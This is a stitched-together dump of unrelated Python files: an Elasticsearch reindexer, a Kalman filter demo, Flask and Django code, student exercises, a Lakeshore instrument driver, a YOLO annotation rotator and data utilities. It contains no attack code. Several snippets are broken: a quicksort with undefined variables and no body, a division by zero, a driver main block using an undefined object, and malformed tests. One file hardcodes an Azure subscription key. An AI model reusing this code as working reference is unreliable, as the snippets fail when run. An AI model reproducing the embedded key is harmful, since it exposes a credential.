response = es_client.search(
index='topic',
body={
"size": 2900,
"query": {
"match_all": {
}
},"_source":["title","summary","forum_title"]
},
scroll='1h'
)
scroll_id = response['_scroll_id']
total = 0
while scroll_id:
count = len(response['hits']['hits'])
if count<=0:
break
total+=count
print(total)
bulk_docs = []
for hits in response['hits']['hits']:
source = hits['_source']
doc_id = int(hits['_id'])
data= {}
data['id'] = doc_id
title = source.get('title','')
summary = source.get('summary','')
forum_title = source.get('forum_title',"")
if forum_title is None:
print(source)
print(doc_id)
forum_title_concat_title = forum_title + " "+title
forum_title_concat_title = forum_title_concat_title.lower()
data['title_init'] = forum_title_concat_title
data['title_not_analyzed'] = forum_title_concat_title
data['title_smart'] = forum_title_concat_title
data['title_max'] = forum_title_concat_title
data['title_std'] = title
forum_title_concat_summary = forum_title + " "+summary
forum_title_concat_summary = forum_title_concat_summary.lower()
data['summary_init'] = forum_title_concat_summary
data['summary_not_analyzed'] = forum_title_concat_summary
data['summary_smart'] = forum_title_concat_summary
data['summary_max'] = forum_title_concat_summary
data['summary_std'] = summary
index_doc={}
index_doc['update'] = {
'_index': index,
'_type': '_doc',
'_id': doc_id
}
doc_values ={"doc": data}
bulk_docs.append(index_doc)
bulk_docs.append(doc_values)
if len(bulk_docs) > 0:
es_client.bulk(bulk_docs, '_doc', index)
response = es_client.scroll(scroll_id=scroll_id, scroll='1h')
scroll_id = response['_scroll_id']
|
import matplotlib.pyplot as plt
from numpy import *
from random import random
class kalman(object):
def __init__(self, x0, p0, a, b, c, vv, vw):
self.x_ = 0 # A priori estimate state
self.x = x0 # A posteriori estimate state
self.p_ = 0 # A priori error covariance matrix
self.p = p0 # A posteriori error covariance matrix
self.a = a # Transition model
self.b = b #
self.c = c # Observation model
self.g = 0 # Kalman gain
self.vv = vv # Variance of process noise
self.vw = vw # Variance of observation noise
def predict(self):
self.x_ = self.a * self.x
self.p_ = self.a * self.p * self.a.T + self.vv * self.b * self.b.T
def update(self, y):
self.g = (self.p_ * self.c) / (self.c.T * self.p_ * self.c + self.vw)
self.x = self.x_ + self.g * (y - self.c.T * self.x_)
self.p = (1 - self.g * self.c.T) * self.p_
if __name__ == "__main__":
x0 = 0.
p0 = 0.
a = array(1)
b = array(1)
c = array(1)
vv = 1.
vw = 5.
k = kalman(x0, p0, a, b, c, vv, vw)
n = 300
T = 2*pi
s = []
r = []
rk = []
t = arange(0., T, T/n)
for i in t:
k.predict()
# True value
x = 20. * sin(i) + sqrt(vv) *2*(random()-0.5)
s.append(x)
# Observation value
y = x + sqrt(vw) * 2*(random()-0.5)
k.update(y)
r.append(y)
# Estimate value
rk.append(k.x)
fig, ax = plt.subplots()
plt.xlabel("Time")
plt.ylabel("Amplitude")
plt.title("Simulation result")
ms = 2
ax.plot(t, s, color='g', linestyle='--', marker='+', markersize=ms, label='True value')
ax.plot(t, r, color='r', linestyle=':', marker=',', markersize=ms, label='Observation value')
ax.plot(t, rk, color='b', linestyle='-', marker='.', markersize=ms, label='Estimate value')
legend = ax.legend(loc='upper right', shadow=True)
frame = legend.get_frame()
plt.show()
|
from django.shortcuts import render
from .models import Informaciones
from django.views import generic
# Create your views here.
class InformacioneListView(generic.ListView):
model = Informaciones
template_name='Naruto.html'
context_object_name='Informaciones_list'
|
#!/usr/bin/python3
import pytest
import os
import urllib
# from .app import app as myapp
from .helpers import Vocabulary, FileManager, EpithetGenerator
from flask import Flask
from flask_testing import LiveServerTestCase
from unittest.mock import patch
dir_path = os.path.abspath("../../resources")
path_json = os.path.join(dir_path, "data.json")
path_csv = os.path.join(dir_path, "data.csv")
ext_path = os.path.join(dir_path, 'data')
class Test_file_manager:
"""test the file manager"""
file = FileManager()
def test_get_ext(self):
assert self.file.get_extension(ext_path) == 'json' or 'csv'
def test_read_json(self):
assert self.file.read_json(path_json)
class Test_vocab:
"""test the vocab dict"""
data = Vocabulary()
def test_from_file(self):
assert self.data.from_file(path_json)
def test_from_json(self):
assert self.data.from_json(path_json)
class TestEpithet:
"""test the epithet generator"""
test_epithet = EpithetGenerator()
def test_vocab_data(self):
assert self.test_epithet.vocab_data(path_json)
class TestFlask:
"""test flask connections and json data"""
def test_json_data_index(self, client):
res = client.get('/')
assert res == 200
assert res.json is not None
assert res.json['epithet'] is not None
assert len(res.json['epithet']) == 1
def test_vocab_json(self, client):
res = client.get('/vocabulary')
assert res == 200
assert res.json is not None
assert res.json['vocabulary'] is not None
@patch("random.randint", return_value=3)
def random_epithet_test(self, client, a):
res = client.get('/epithet')
assert res == 200
assert res.json['epithets'] is not None
assert len(res.json['epithets']) == 3
def num_epithets_test(self, client):
res = client.get('/epithet/10')
assert res == 200
assert res.json['epithets'] is not None
assert len(res.json['epithets']) == 10
|
from __future__ import division
#encoding:utf-8
import pandas as pd
import numpy as np
'''
功能:计算回归分析模型中常用的四大评价指标
'''
from sklearn.metrics import explained_variance_score, mean_absolute_error, median_absolute_error, r2_score
def calPerformance(y_true,y_pred):
'''
模型效果指标评估
y_true:真实的数据值
y_pred:回归模型预测的数据值
mean_absolute_error:平均绝对误差(Mean Absolute Error,MAE),用于评估预测结果和真实数据集的接近程度的程度
,其其值越小说明拟合效果越好。
explained_variance_score:解释回归模型的方差得分,其值取值范围是[0,1],越接近于1说明自变量越能解释因变量
的方差变化,值越小则说明效果越差。
r2_score:判定系数,其含义是也是解释回归模型的方差得分,其值取值范围是[0,1],越接近于1说明自变量越能解释因
变量的方差变化,值越小则说明效果越差。
'''
model_metrics_name=[mean_absolute_error, median_absolute_error,explained_variance_score, r2_score]
tmp_list=[]
for one in model_metrics_name:
tmp_score=one(y_true,y_pred)
tmp_list.append(tmp_score)
print(['mean_absolute_error','median_absolute_error','explained_variance_score','r2_score'])
print(tmp_list)
return tmp_list
if __name__=='__main__':
inputfile = './datasave/new_reg_data_GM11_revenue.csv' #输入的数据文件
data = pd.read_csv(inputfile)
data.drop(data[np.isnan(data['y'])].index, inplace=True)
y_pred = data['y_pred']
y_true = data['y']
calPerformance(y_true,y_pred)
|
#!/usr/bin/python
from os import getenv
from datetime import datetime, timedelta
from time import mktime
from email.Utils import formatdate
steps = ('Start', 'Weiter', 'Noch weiter', 'Ende')
path_info = getenv('PATH_INFO', '')
if len(path_info) >= 2 and path_info[0] == '/':
step = int(path_info[1:])
else:
step = 0
now = datetime.now()
expires = now + timedelta(days=1)
expires = mktime(expires.timetuple())
print "Content-Type: text/html"
print "Expires: %s" % formatdate(timeval=expires, localtime=False, usegmt=True)
print
print "<div style='border:1px solid black;'><table width=100% border><tr>"
for i in range(len(steps)):
label = steps[i]
if i == step:
print "<td><b>%s</b></td>" % label
else:
print "<td><a c:base='widget' c:mode='focus' href='%d'>%s</a></td>" % (i, label)
print "</tr></table>"
if step == 0:
print "Willkommen beim Wizard!"
elif step == 1:
print "<c:widget type='demo_date2_http'/>"
elif step == 2:
print "<c:widget type='demo_hello'/>"
elif step == 3:
print "Ende."
else:
print "Fehler."
print "</div>"
|
from azure.cognitiveservices.language.textanalytics import TextAnalyticsClient
from msrest.authentication import CognitiveServicesCredentials
subscription_key = "cced4caa372c41deac94a069a20212f2"
endpoint = "https://kardel2.cognitiveservices.azure.com/"
credentials = CognitiveServicesCredentials(subscription_key)
text_analytics = TextAnalyticsClient(endpoint=endpoint, credentials=credentials)
documents = [
{
"id": "1",
"language": "en",
"text": "@Breaking911 Build that wall!! 👍"
}
]
response = text_analytics.entities(documents=documents)
for document in response.documents:
print("Document Id: ", document.id)
print("\tKey Entities:")
for entity in document.entities:
print("\t\t", "NAME: ", entity.name, "\tType: ",
entity.type, "\tSub-type: ", entity.sub_type)
for match in entity.matches:
print("\t\t\tOffset: ", match.offset, "\tLength: ", match.length, "\tScore: ",
"{:.2f}".format(match.entity_type_score))
|
"""
Crie um programa que receba uma lista de inteiros e depois receba mais um inteiro f
após isso, mova todos os valores f da lista original para o final da lista.
Exemplo
Entrada Saída
[1, 2, 1, 4, 5, 1, 9], 1 [2, 4, 5, 9, 1, 1, 1]
"""
lista = []
index = 5
ocorrencias=0
cont = 0
for i in range(index):
item = int(input("Digite o valor a ser adicionado na lista: "))
lista.append(item)
final = int(input("Digite o valor a ser movido para o final: "))
while cont<index:
if lista[cont]==final:
lista.pop(cont)
ocorrencias+=1
cont-=1
index-=1
cont+=1
for i in range(ocorrencias):
lista.append(final)
print(lista)
|
# Generated by Django 2.2.3 on 2019-07-18 10:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("robbit", "0005_image_faves")]
operations = [
migrations.AlterField(
model_name="image",
name="faves",
field=models.PositiveIntegerField(db_index=True),
)
]
|
#Given envelopes = [[5,4],[6,4],[6,7],[2,3]],
#the maximum number of envelopes you can Russian doll is 3 ([2,3] => [5,4] => [6,7]).
|
#coding=utf-8
import zipfile
from . import main
from flask import render_template, redirect, url_for,request,jsonify,Response
from ..models.Photo import Photo
from ..models.Album import Album
# from config import ALLOWED_FILE
# allowed_files = ['jpg','png','zip','rar']
def filetype(filename):
return '.' in filename and filename.rsplit('.',1)[1]
@main.route('/')
def index():
#首页
#页码
page = int(request.args.get('page',0))
count = int(request.args.get('count',1))
# imgs = Photo.objects[(page-1)*count:page*count]
imgs = Photo.objects
imgs = [i.to_dict() for i in imgs]
return render_template('home.html',imgs=imgs)
@main.route('/img/<id>')
def img(id):
#图片
photo = Photo.objects.get(id=id)
img = photo.img.read()
res = Response(img,mimetype="image/jpeg")
return res
@main.route('/album')
def album():
#相册页
return render_template('album.html')
@main.route('/upload',methods=['GET','POST'])
def upload():
#上传照片或者上传压缩文件
album_name = ''
file = request.files['file']
filename = file.filename
if file:
if filetype(filename) in ['zip','rar','ZIP','RAR']:
#压缩文件
z = zipfile.ZipFile(file,'r')
for i in z.namelist():
img_name = i
if filetype(img_name) in ['png','jpg']:
#判断压缩文件是否是图片
img = z.read(i)
Photo(img_name=img_name,img=img).save()
return jsonify({'msg': '压缩包上传成功', 'type': 'success'})
elif filetype(filename) in ['png','jpg','jepg','PNG','JPG','JEPG']:
#图片文件
Photo(album_name=album_name,img=file).save()
return jsonify({'msg': '图片上传成功', 'type': 'success'})
else:
return jsonify({'msg': '上传失败', 'type': 'error'})
@main.route('/api/new-album',methods=['GET','POST'])
def new_album():
#新建相册
name = request.form.get('name')
try:
album = Album.objects.get(name=name)
if album:
return jsonify({'msg': '创建成功,相册已存在', 'type': 'error'})
except:
pass
Album(name=name).save()
return jsonify({'msg': '相册创建成功', 'type': 'success'})
@main.route('/api/albums',methods=['GET','POST'])
def albums():
#获取所有的相册信息
albums = Album.objects()
data = [i.to_dict() for i in albums]
return jsonify(data)
|
from typing import Dict, ClassVar
from qcodes.instrument_drivers.Lakeshore.lakeshore_base import (
LakeshoreBase, BaseOutput, BaseSensorChannel)
from qcodes.instrument.group_parameter import GroupParameter, Group
import qcodes.utils.validators as vals
# There are 16 sensors channels (a.k.a. measurement inputs) in Model 372
_n_channels = 16
class Output_372(BaseOutput):
"""Class for control outputs (heaters) of model 372"""
MODES: ClassVar[Dict[str, int]] = {
'off': 0,
'monitor_out': 1,
'open_loop': 2,
'zone': 3,
'still': 4,
'closed_loop': 5,
'warm_up': 6}
POLARITIES: ClassVar[Dict[str, int]] = {
'unipolar': 0,
'bipolar': 1}
RANGES: ClassVar[Dict[str, int]] = {
'off': 0,
'31.6μA': 1,
'100μA': 2,
'316μA': 3,
'1mA': 4,
'3.16mA': 5,
'10mA': 6,
'31.6mA': 7,
'100mA': 8}
def __init__(self, parent, output_name, output_index) -> None:
super().__init__(parent, output_name, output_index, has_pid=True)
self.input_channel.vals = vals.Numbers(1, _n_channels)
# Add more parameters for OUTMODE command
# and redefine the corresponding group
self.add_parameter('polarity',
label='Output polarity',
docstring='Specifies output polarity (not '
'applicable to warm-up heater)',
val_mapping=self.POLARITIES,
parameter_class=GroupParameter)
self.add_parameter('use_filter',
label='Use filter for readings',
docstring='Specifies controlling on unfiltered or '
'filtered readings',
val_mapping={True: 1, False: 0},
parameter_class=GroupParameter)
self.add_parameter('delay',
label='Delay',
unit='s',
docstring='Delay in seconds for setpoint change '
'during Autoscanning',
vals=vals.Ints(0, 255),
get_parser=int,
parameter_class=GroupParameter)
self.output_group = Group([self.mode, self.input_channel,
self.powerup_enable, self.polarity,
self.use_filter, self.delay],
set_cmd=f'OUTMODE {output_index}, {{mode}}, '
f'{{input_channel}}, '
f'{{powerup_enable}}, {{polarity}}, '
f'{{use_filter}}, {{delay}}',
get_cmd=f'OUTMODE? {output_index}')
self.P.vals = vals.Numbers(0.0, 1000)
self.I.vals = vals.Numbers(0.0, 10000)
self.D.vals = vals.Numbers(0, 2500)
class Model_372_Channel(BaseSensorChannel):
SENSOR_STATUSES = {0: 'OK',
1: 'CS OVL',
2: 'VCM OVL',
4: 'VMIX OVL',
8: 'VDIF OVL',
16: 'R. OVER',
32: 'R. UNDER',
64: 'T. OVER',
128: 'T. UNDER'}
def __init__(self, parent, name, channel):
super().__init__(parent, name, channel)
# Parameters related to Input Channel Parameter Command (INSET)
self.add_parameter('enabled',
label='Enabled',
docstring='Specifies whether the input/channel is '
'enabled or disabled. At least one '
'measurement input channel must be '
'enabled. If all are configured to '
'disabled, channel 1 will change to '
'enabled.',
val_mapping={True: 1, False: 0},
parameter_class=GroupParameter)
self.add_parameter('dwell',
label='Dwell',
docstring='Specifies a value for the autoscanning '
'dwell time.',
unit='s',
get_parser=int,
vals=vals.Numbers(1, 200),
parameter_class=GroupParameter)
self.add_parameter('pause',
label='Change pause time',
docstring='Specifies a value for '
'the change pause time',
unit='s',
get_parser=int,
vals=vals.Numbers(3, 200),
parameter_class=GroupParameter)
self.add_parameter('curve_number',
label='Curve',
docstring='Specifies which curve the channel uses: '
'0 = no curve, 1 to 59 = standard/user '
'curves. Do not change this parameter '
'unless you know what you are doing.',
get_parser=int,
vals=vals.Numbers(0, 59),
parameter_class=GroupParameter)
self.add_parameter('temperature_coefficient',
label='Change pause time',
docstring='Sets the temperature coefficient that '
'will be used for temperature control if '
'no curve is selected (negative or '
'positive). Do not change this parameter '
'unless you know what you are doing.',
val_mapping={'negative': 1, 'positive': 2},
parameter_class=GroupParameter)
self.output_group = Group([self.enabled, self.dwell, self.pause,
self.curve_number,
self.temperature_coefficient],
set_cmd=f'INSET {self._channel}, '
f'{{enabled}}, {{dwell}}, {{pause}}, '
f'{{curve_number}}, '
f'{{temperature_coefficient}}',
get_cmd=f'INSET? {self._channel}')
# Parameters related to Input Setup Command (INTYPE)
self.add_parameter('excitation_mode',
label='Excitation mode',
docstring='Specifies excitation mode',
val_mapping={'voltage': 0, 'current': 1},
parameter_class=GroupParameter)
# The allowed values for this parameter change based on the value of
# the 'excitation_mode' parameter. Moreover, there is a table in the
# manual that assigns the numbers to particular voltage/current ranges.
# Once this parameter is heavily used, it can be implemented properly
# (i.e. using val_mapping, and that val_mapping is updated based on the
# value of 'excitation_mode'). At the moment, this parameter is added
# only because it is a part of a group.
self.add_parameter('excitation_range_number',
label='Excitation range number',
docstring='Specifies excitation range number '
'(1-12 for voltage excitation, 1-22 for '
'current excitation); refer to the manual '
'for the table of ranges',
get_parser=int,
vals=vals.Numbers(1, 22),
parameter_class=GroupParameter)
self.add_parameter('auto_range',
label='Auto range',
docstring='Specifies auto range setting',
val_mapping={'off': 0, 'current': 1},
parameter_class=GroupParameter)
self.add_parameter('range',
label='Range',
val_mapping={'2.0 mOhm': 1,
'6.32 mOhm': 2,
'20.0 mOhm': 3,
'63.2 mOhm': 4,
'200 mOhm': 5,
'632 mOhm': 6,
'2.00 Ohm': 7,
'6.32 Ohm': 8,
'20.0 Ohm': 9,
'63.2 Ohm': 10,
'200 Ohm': 11,
'632 Ohm': 12,
'2.00 kOhm': 13,
'6.32 kOhm': 14,
'20.0 kOhm': 15,
'63.2 kOhm': 16,
'200 kOhm': 17,
'632 kOhm': 18,
'2.0 MOhm': 19,
'6.32 MOhm': 20,
'20.0 MOhm': 21,
'63.2 MOhm': 22},
parameter_class=GroupParameter)
self.add_parameter('current_source_shunted',
label='Current source shunt',
docstring='Current source either not shunted '
'(excitation on), or shunted '
'(excitation off)',
val_mapping={False: 0, True: 1},
parameter_class=GroupParameter)
self.add_parameter('units',
label='Preferred units',
docstring='Specifies the preferred units parameter '
'for sensor readings and for the control '
'setpoint (kelvin or ohms)',
val_mapping={'kelvin': 1, 'ohms': 2},
parameter_class=GroupParameter)
self.output_group = Group([self.excitation_mode,
self.excitation_range_number,
self.auto_range, self.range,
self.current_source_shunted, self.units],
set_cmd=f'INTYPE {self._channel}, '
f'{{excitation_mode}}, '
f'{{excitation_range_number}}, '
f'{{auto_range}}, {{range}}, '
f'{{current_source_shunted}}, '
f'{{units}}',
get_cmd=f'INTYPE? {self._channel}')
class Model_372(LakeshoreBase):
"""
Lakeshore Model 372 Temperature Controller Driver
Note that interaction with the control input (referred to as 'A' in the
Computer Interface Operation section of the manual) is not implemented.
"""
channel_name_command: Dict[str, str] = {'ch{:02}'.format(i): str(i)
for i in range(1, 1 + _n_channels)}
CHANNEL_CLASS = Model_372_Channel
def __init__(self, name: str, address: str, **kwargs) -> None:
super().__init__(name, address, **kwargs)
self.sample_heater = Output_372(self, 'sample_heater', 0)
self.sample_heater = Output_372(self, 'sample_heater', '')
self.warmup_heater = Output_372(self, 'warmup_heater', 1)
self.analog_heater = Output_372(self, 'analog_heater', 2)
if __name__ == "__main__":
Instrument.close_all()
# with logger.console_level(logging.DEBUG):
# LS370 = Model_372(name = 'LS370 input Ch', address = 'GPIB::12::INSTR', terminator='\n')
#
# print( LS370.ch08.temperature.get())
# LS370 = Model_372(name = 'LS370 input Ch', address = 'GPIB::12::INSTR', terminator='\n')
# print( LS370.ch08.temperature.get())
#
# print(LS370.write('*RST'))
print(LS370.ch08.temperature.get())
# LS370OPT = Output_372(address = 'GPIB::12::INSTR', terminator='\n')
# print(LS370OPT.Output_372.ploarity.get())
|
def quicksort(a, l, r):
if l >= r: return
mid = partition(a, l, r)
quicksort(a, l, mid - 1)
quicksort(a, m + 1, r)
def partition(a, l, r):
x = a[l]
j = i
if __name__ == '__main__':
numbers = map(int, input().split())
quicksort(numbers, 0, len(numbers))
print(numbers)
|
x=float(input("x= "))
if ((x%2==0)and(x/0==0)):
x=1
print("f(x): ",x)
elif(x<0):
x=0
print("f(x): ",x)
else:
x=(-1)
print("f(x): ",x)
|
# -*- coding: utf-8 -*-
# $ pip install opencv-python
# $ pip install pillow
# Python3
# Usage: $ Python yolo-img-rotate-del_exif_windows.py image_folder
#
import sys
import cv2
import glob
import numpy as np
from PIL import Image
from PIL.ExifTags import TAGS
import shutil
import os
from os import listdir, getcwd
from os.path import join
# バウンディング・ボックスのアフィン変換
def convert_coordinate(box, size, deg):
print("start convert_rotate function:")
x = box[0]
y = box[1]
w = size[0]
h = size[1]
print("deg =", deg)
print("x =", x)
print("y =", y)
print("w =", w)
print("h =", h)
if deg == '0':
print("deg = 0")
x2 = x
y2 = y
w2 = w
h2 = h
elif deg == '90':
print("deg = 90")
x2 = 1 - y
y2 = x
w2 = h
h2 = w
elif deg == '180':
print("deg = 180")
x2 = 1 - x
y2 = 1 - y
w2 = w
h2 = h
elif deg == '270':
print("deg = 270")
x2 = y
y2 = 1 - x
w2 = h
h2 = w
else:
print("deg = else")
x2 = x
y2 = y
w2 = w
h2 = h
print("deg =", deg)
print("x2 =", x2)
print("y2 =", y2)
print("w2 =", w2)
print("h2 =", h2)
return (x2, y2, w2 ,h2)
# 画像の回転~新しいファイル名で保存
def rotate_img(fname, deg):
img = Image.open(fname)
# 左回転に変換
deg2 = 360 - int(deg)
img_rotate = img.rotate(deg2, expand=True, resample=Image.BICUBIC)
# ファイル名と拡張子を取得
name_base, name_ext = os.path.splitext(fname)
# print(name_base)
# ファイル名を変更して保存
img_rotate.save(name_base + '-' + str(deg) + '.jpg')
print(name_base + '-' + str(deg) + '.jpg' + ' is saved.')
# 画像のExifデータを取り出す
def get_exif_of_image(file):
im = Image.open(file)
# Exif データを取得
# 存在しなければそのまま終了 空の辞書を返す
try:
exif = im._getexif()
# タグIDそのままでは人が読めないのでデコードして
# テーブルに格納する
exif_table = {}
for tag_id, value in exif.items():
tag = TAGS.get(tag_id, tag_id)
exif_table[tag] = value
except AttributeError:
print(" exif が存在しません")
return {}
print(" exif-orientation: {0}".format(exif_table['Orientation']))
return exif_table
# ExifテーブルのOrientationの数値から、回転する角度と、ミラー反転するかどうかを取得する
def get_exif_rotation(orientation_num):
"""
return 回転角度,反転するか(0 1)
# 参考: https://qiita.com/minodisk/items/b7bab1b3f351f72d534b
"""
if orientation_num == 1:
return 0, 0
if orientation_num == 2:
return 0, 1
if orientation_num == 3: # 元画像は、180度、右に回転している
return 180, 0
if orientation_num == 4:
return 180, 1
if orientation_num == 5:
return 270, 1
if orientation_num == 6: # 元画像は、90度、右に回転している
return 270, 0
if orientation_num == 7:
return 90, 1
if orientation_num == 8: # 元画像は、270度、右に回転している
return 90, 0
# Exif情報を使用して、画像を回転し、新しいファイル名で保存する
def rotate_exif_info(path, to_path):
print(" Func: rotate_exif_info() is called.")
# to_save_path = to_path + os.path.sep + os.path.basename(path)
to_save_path = to_path + '/' + os.path.basename(path)
if os.path.exists(to_path) is False:
os.makedirs(to_path)
exif = get_exif_of_image(path)
rotate = 0
reverse = 0
if 'Orientation' in exif:
rotate, reverse = get_exif_rotation(exif['Orientation'])
img = Image.open(path)
data = img.getdata()
mode = img.mode
size = img.size
with Image.new(mode, size) as dst:
dst.putdata(data)
if reverse == 1:
dst = ImageOps.mirror(dst)
if rotate != 0:
dst = dst.rotate(rotate, expand=True)
dst.save(to_save_path)
# メイン
def main():
# 引数1から画像フォルダ名取得
args = sys.argv
if (len(args) != 2):
print("Usage: $ python" + args[0] + " image")
quit()
folder_name = args[1]
print("Folder name (args[1]) is %s" % folder_name)
# 存在する画像ファイル(*.jpg)一覧の取得
for file_name in glob.glob('./%s/*.jpg' % folder_name):
print("File name is %s" % file_name)
dir_name = os.path.splitext(os.path.dirname(file_name))[0]
print(" dir_name: %s" % dir_name)
base_name = os.path.splitext(os.path.basename(file_name))[0]
print(" base_name: %s" % base_name)
# <1> 回転
print("<1> Start rotation:")
# 存在する画像ファイル(*.jpg)一覧の取得
for file_name in glob.glob('./%s/*.jpg' % folder_name):
print("File name is %s" % file_name)
# 0°回転(Exif削除のために呼び出す)
rotate_img(file_name, 0)
'''
# 90°回転(Ralphにあわせて右回転指示)
rotate_img(file_name, 90)
# 180°回転(Ralphにあわせて右回転指示)
rotate_img(file_name, 180)
# 270°回転(Ralphにあわせて右回転指示)
rotate_img(file_name, 270)
'''
# <2> アノテーションファイルの生成
print("<2> Start annotation:")
# 存在するアノテーションファイル(*.txt)一覧の取得
for file_name in glob.glob('./%s/*.txt' % folder_name):
print("File name is %s" % file_name)
# ファイル名と拡張子を取得
name_base, name_ext = os.path.splitext(file_name)
print(" name_base: %s" % name_base)
print(" name_ext: %s" % name_ext)
base_name = os.path.splitext(os.path.basename(file_name))[0]
print(" base_name: %s" % base_name)
# 1行抜き出し
for line in open(file_name, 'r'):
print("Label name is %s" % file_name)
print("Image name is %s" % file_name.replace(".txt",".jpg"))
# 画像サイズを知る
img = cv2.imread(file_name.replace(".txt",".jpg"), cv2.IMREAD_IGNORE_ORIENTATION | cv2.IMREAD_COLOR)
#
# OpeCV Docs imread()
# If EXIF information are embedded in the image file,
# the EXIF orientation will be taken into account
# and thus the image will be rotated accordingly
# except if the flag IMREAD_IGNORE_ORIENTATION is passed.
#
# ImreadModes()
# IMREAD_IGNORE_ORIENTATION: If set, do not rotate the image according to EXIF's orientation flag.
h, w = img.shape[:2]
print("h =", h)
print("w =", w)
# 分類番号、座標抽出
l = line.split(" ")
print(l[0]) # 分類番号
print(l[1]) # バウンディングボックス x座標
print(l[2]) # バウンディングボックス y座標
print(l[3]) # バウンディングボックス 幅 w
print(l[4]) # バウンディングボックス 高さ h
# 文字→数値化
bbox = (int(l[0]), float(l[1]), float(l[2]), float(l[3]), float(l[4]))
class_num = bbox[0]
x = bbox[1]
y = bbox[2]
w = bbox[3]
h = bbox[4]
# 座標回転+平行移動(アフィン変換)
# degs = ['0', '90', '180', '270']
degs = ['0']
for deg in degs:
# 変換
bbox2 = convert_coordinate((x, y), (w,h), deg)
print(str(class_num), " ".join([str(a) for a in bbox2]))
print(".")
# 同じ名前に角度を追記してファイル保存
# name_base, name_ext = os.path.splitext(file_name)
# list_write_file = open(name_base + '-' + deg + '.txt', 'a', newline="\n")
with open(name_base + '-' + deg + '.txt', 'a', newline='\n') as list_write_file:
list_write_file.write(str(class_num) + " " + " ".join([str(a) for a in bbox2]) + "\n")
list_write_file.close()
# オリジナル画像の移動(0度も作成するのでダブル)
backup_dir = folder_name + '/backup'
if not os.path.exists(backup_dir) :
os.makedirs(backup_dir)
print("オリジナル画像を ./backup へ移動します")
from_file_jpg = name_base + '.jpg' # file_name
from_file_txt = name_base + '.txt'
to_file_jpg = backup_dir + '/' + base_name + '.jpg'
to_file_txt = backup_dir + '/' + base_name + '.txt'
shutil.move(from_file_jpg, to_file_jpg)
shutil.move(from_file_txt, to_file_txt)
if __name__ == '__main__':
main()
print("Done!")
|
import io
import os
import tarfile
import errno
import json
import zipfile
import os.path as osp
import numpy as np
import pandas as pd
from tensorflow.keras.utils import get_file
__all__ = [
'download_file', 'files_exist', 'makedirs', 'makedirs_from_filepath',
'extractall', 'remove', 'load_npz', 'read_csv', 'read_json',
]
def download_file(raw_paths, urls):
if isinstance(raw_paths, str):
raw_paths = (raw_paths, )
if isinstance(urls, str):
urls = (urls, )
assert len(raw_paths) == len(urls)
exceptions = []
for filename, url in zip(raw_paths, urls):
if not osp.exists(filename):
try:
get_file(filename, origin=url, extract=False)
except Exception as e:
exceptions.append(e)
print(f"Downloading failed: {url}")
if exceptions:
raise exceptions[0]
def extractall(filename, folder=None):
"""Extracts a zip or tar.gz (tgz) archive to a specific folder.
Parameters:
-----------
filename (string): The path to the tar archive.
folder (string): The folder.
"""
if not filename:
return
if isinstance(filename, (list, tuple)):
for f in filename:
extractall(f, folder)
return
if folder is None:
folder = osp.dirname(osp.realpath(osp.expanduser(filename)))
if filename.endswith(".zip"):
with zipfile.ZipFile(filename, 'r') as f:
f.extractall(folder)
if filename.endswith(".tgz") or filename.endswith(".tar.gz"):
tar = tarfile.open(filename, "r:gz")
tar.extractall(path=folder)
tar.close()
def remove(filepaths):
if isinstance(filepaths, str):
filepaths = (filepaths, )
for path in filepaths:
if osp.exists(path):
os.unlink(path)
def files_exist(files) -> bool:
if not files:
return False
if isinstance(files, (list, tuple)):
return len(files) != 0 and all([osp.exists(f) for f in files])
else:
return osp.exists(files)
def makedirs(path: str):
try:
os.makedirs(osp.expanduser(osp.normpath(path)), exist_ok=True)
except OSError as e:
if e.errno != errno.EEXIST and osp.isdir(path):
raise e
def makedirs_from_filepath(filepath: str, verbose: bool = True):
folder = osp.dirname(osp.realpath(osp.expanduser(filepath)))
makedirs(folder)
def load_npz(filepath):
filepath = osp.abspath(osp.expanduser(filepath))
if not filepath.endswith('.npz'):
filepath = filepath + '.npz'
if osp.isfile(filepath):
with np.load(filepath, allow_pickle=True) as loader:
loader = dict(loader)
for k, v in loader.items():
if v.dtype.kind in {'O', 'U'}:
loader[k] = v.tolist()
return loader
else:
raise ValueError(f"{filepath} doesn't exist.")
def read_csv(reader, dtype=np.int32):
if isinstance(reader, str):
reader = osp.abspath(osp.expanduser(reader))
else:
reader = io.BytesIO(reader)
return pd.read_csv(reader,
encoding="utf8",
sep=",",
dtype={"switch": dtype})
def read_json(filepath):
with open(filepath, "r", encoding="utf-8") as f:
data = json.load(f)
return data
|
from graph_txt_files.txt_functions.graph_calculator import calc
from graph_txt_files.txt_functions.graph_property_names import property_names
import grinpy as gp
import os
import pickle
exceptions = ['randic_index',
'augmented_randic_index',
'harmonic_index',
'atom_bond_connectivity_index',
'sum_connectivity_index',
'min_degree',
'max_degree',
'number_of_min_degree_nodes',
'number_of_max_degree_nodes']
__all__ = ['make_graph_db', 'exceptions']
def make_graph_db(graph_type):
if graph_type == 'cubic':
property_names_valid = [x for x in property_names if x not in exceptions]
else:
property_names_valid = property_names
graphs = [line[:-1] for
line in os.popen('ls '+'graph_txt_files/graph_txt_folders/'+graph_type)]
size = len(graphs)
counter = 1
pickle_dict = dict()
for graph in graphs:
pickle_dict[graph] = dict()
G = gp.read_edgelist('graph_txt_files/graph_txt_folders/'+graph_type+'/'+graph)
for graph_property in property_names_valid:
pickle_dict[graph][graph_property] = calc(G, graph_property)
print('Graph', counter, 'of', size)
counter += 1
pickle_out = open('graph_data/'+graph_type, 'wb')
pickle.dump(pickle_dict, pickle_out)
pickle_out.close()
return None
|
import os
import numpy
from typing import Optional
from phi import math
from phi.field import Scene
from phiml.math import shape, wrap, channel, spatial, batch
from phiml.backend import ML_LOGGER
@math.broadcast
def load_scalars(scene: Scene or str,
name: str,
prefix='log_',
suffix='.txt',
x: Optional[str]='steps',
entries_dim=spatial('iteration'),
batch_dim=batch('batch')):
"""
Read one or a `Tensor` of scalar logs as curves.
Args:
scene: `Scene` or `str`. Directory containing the log files.
name: Log file base name.
prefix: Log file prefix.
suffix: Log file suffix.
x: 'steps' or 'time'
entries_dim: Curve dimension.
Returns:
`Tensor` containing `entries_dim` and `vector`.
"""
assert x in (None, 'steps', 'time')
if isinstance(scene, str):
scene = Scene.at(scene)
assert isinstance(scene, Scene), f"scene must be a Scene or str but got {type(scene)}"
assert shape(scene).rank == 0, f"Use math.map(load_scalars, ...) to load data from multiple scenes"
ML_LOGGER.debug(f"Reading {os.path.join(scene.path, f'{prefix}{name}{suffix}')}")
curve = numpy.loadtxt(os.path.join(scene.path, f"log_{name}.txt"))
if curve.ndim == 2:
